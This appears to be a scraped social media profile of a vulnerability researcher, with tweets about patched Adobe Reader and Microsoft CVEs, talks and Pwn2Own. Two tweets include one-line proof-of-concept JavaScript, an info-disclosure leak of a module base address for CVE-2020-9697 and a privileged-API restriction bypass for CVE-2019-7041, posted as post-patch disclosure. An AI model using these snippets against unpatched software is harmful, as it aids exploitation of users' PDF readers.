AbdulAziz Hariri
1,446 posts
AbdulAziz Hariri
@abdhariri
Opinions expressed here are my own.
Earth
Joined July 2010
- One of the rare times that I've felt bad for killing a bug. An undocumented API that seems to have existed for ~13 years.CVE-2020-9697: Info disclosure in #Adobe Reader. PoC: var a = app.measureDialog(app); console.println("Escript Base: " + (Math.abs(a[1]) - 0x0044b43).toString(16))
00:00 - Microsoft patches are out. Two of my bugs (flagged critical), CVE-2020-1585 and CVE-2020-1560, were fixed.
- Adobe's CVE-2019-7041 is a cute typo (app.Priv instead of app.endPriv) in the folder level JS that allows API restrictions bypass poc: this.__proto__.app.Priv = [Privileged API] - It still requires a certain level of user-interaction. This bug was found by @WanderingGlitch and I.
- Adobe patches are out: helpx.adobe.com/security/produ…. Adobe patched five of my vulnerabilities: CVE-2020-9697, CVE-2020-9706, CVE-2020-9707, CVE-2020-9710, CVE-2020-9712.
- Excited to be presenting ‘Tackling Privilege Escalation with Offense and Defense’ with @EdgarPek at #BHEU in December: blackhat.com/eu-19/briefing…
- The full schedule for #Pwn2Own Vancouver is now available. We start tomorrow morning at 9:30 with @abdhariri targeting the #Adobe Reader for $50,000. Stay tuned for all the results. zerodayinitiative.com/blog/2024/3/19…
- Today marks my 10th year living in Canada. I’m fortunate to live in such a great country and proud to call myself a Canadian. Je t’aime Canada.
- This vulnerability is definitely one of the cutest (and weirdest) that I've found. Found it while researching new ways to bypass JS API restrictions in Adobe Reader. Will probably share more of the research later this year. zerodayinitiative.com/advisories/ZDI…
